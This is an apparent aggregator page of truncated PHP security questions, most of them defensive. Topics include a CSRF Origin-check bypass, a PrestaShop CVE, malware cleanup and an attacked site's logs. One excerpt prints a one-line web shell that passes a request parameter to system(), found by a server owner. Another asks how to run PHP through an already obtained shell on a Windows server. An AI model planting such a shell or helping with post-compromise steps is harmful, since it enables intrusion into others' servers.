PHP – Page 37 – WindowsTechs.com

How to bypass origin based csrf protection?

Posted on April 2, 2020 by apex

I’m trying to do some csrf attack test on a site.

I found that the site protect itself from csrf by checking the http Origin header.

But I guess maybe under some conditions I can bypass the protection. The website just check if the reque… Continue reading How to bypass origin based csrf protection?→

How to fetch and display data in PHP? [closed]

Posted on April 2, 2020 by Pranil

I store a user login data in one table and store another data like contact , address etc in other table . So how can I fetch and display the user data after user login ?? In PHP MySQL

Continue reading How to fetch and display data in PHP? [closed]→

CVE-2020-5250 php vulnerability analysis

Posted on April 2, 2020 by Karoliine

I am exploring the vulnerability (CVE-2020-5250) found in PrestaShop software versions <1.7.6.4. Could somebody explain how (with which method) was the program exactly exploitable? And why is the patch provided adequate? Is this a commo… Continue reading CVE-2020-5250 php vulnerability analysis→

How to deobfuscate malicious PHP code [duplicate]

Posted on March 28, 2020 by sqrroot

This is my first malware analyis, so apologies for my probably noob-like question.
I’m having a look at a website running an outdated version of Wordpress which was hacked. The Website runs on a shared hosting.

I managed to identify the … Continue reading How to deobfuscate malicious PHP code [duplicate]→

Execute/Install PHP on a Shelled Windows Server? [closed]

Posted on March 24, 2020 by Marcus Adeao

I have obtained a ASP.NET shell on a Windows Server and I need to execute some PHP scripts on the server. PHP env is not installed on the server and neither I have access to RDP.

Is there some workaround?

Continue reading Execute/Install PHP on a Shelled Windows Server? [closed]→

PHP SimpleSAML SSO integration

Posted on March 23, 2020 by Deryn

In my company, I have an existing website built with Laravel, and they want me to use SimpleSaml for SSO logins with an existing IDP. I am very new to PHP as I am a .NET developer and I would like to know how to do this (first steps for a … Continue reading PHP SimpleSAML SSO integration→

There seems to have been an attempt to attack my website [duplicate]

Posted on March 23, 2020 by Kim darry

I am using PHP as a server side language. And I don’t use CMS or Framework. From the nginx log the website attack seems obvious.

I wonder what kind of attack the attacker attempted.

The attacker sent 941 malicious queries over a period o… Continue reading There seems to have been an attempt to attack my website [duplicate]→

There seems to have been an attempt to attack my website [duplicate]

Posted on March 23, 2020 by Kim darry

I am using PHP as a server side language. And I don’t use CMS or Framework. From the nginx log the website attack seems obvious.

I wonder what kind of attack the attacker attempted.

The attacker sent 941 malicious queries over a period o… Continue reading There seems to have been an attempt to attack my website [duplicate]→

Server was compromised, found this line in a recently modified PHP file [closed]

Posted on March 22, 2020 by user229443

I found this at the top of a PHP file in the web server:

<?php if(isset($_REQUEST[‘xxx’])){ echo “<pre>”; $xxx = ($_REQUEST[‘xxx’]); system($xxx); echo “</pre>”; die; }?>

I’m guessing this is how they got the server to … Continue reading Server was compromised, found this line in a recently modified PHP file [closed]→

How Magic functions work with unserialize() in PHP object injection? [migrated]

Posted on March 21, 2020 by Skyper202

I was reading about PHP Object Injection , and i don’t understand how magic functions work with this vulnerability, this is my tested code :

$sec1=serialize($_GET[‘ser’]);
$sec2=unserialize($_GET[‘unser’]);
class ex
{
public $cmd;
functi… Continue reading How Magic functions work with unserialize() in PHP object injection? [migrated]→